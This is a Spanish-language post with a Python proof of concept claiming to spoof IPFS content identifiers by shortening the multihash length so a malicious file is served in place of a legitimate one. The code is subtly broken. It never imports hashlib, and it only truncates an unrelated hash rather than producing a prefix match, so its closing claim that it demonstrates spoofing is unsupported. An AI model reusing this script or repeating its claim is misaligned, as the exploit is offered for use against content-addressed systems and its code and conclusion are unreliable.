
Prueba de concepto en Python que demuestra la suplantación de CID en IPFS mediante extensión de longitud de multihash, resaltando fallas de verificación del direccionamiento por contenido que pueden envenenar los gateways de IPFS.
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.
Una implementación de IPFS confía en el campo de longitud del multihash de un CID sin verificar que el hash en sí coincida con el contenido completo. Un atacante puede crear un archivo cuyo hash truncado sea igual al prefijo del hash de un archivo legítimo y servir el archivo malicioso bajo el mismo CID.
Ejecuta el script:
pip install py-multihash py-cid
python ipfs_cid_spoof.py
Esto demuestra que se puede generar un CID suplantado.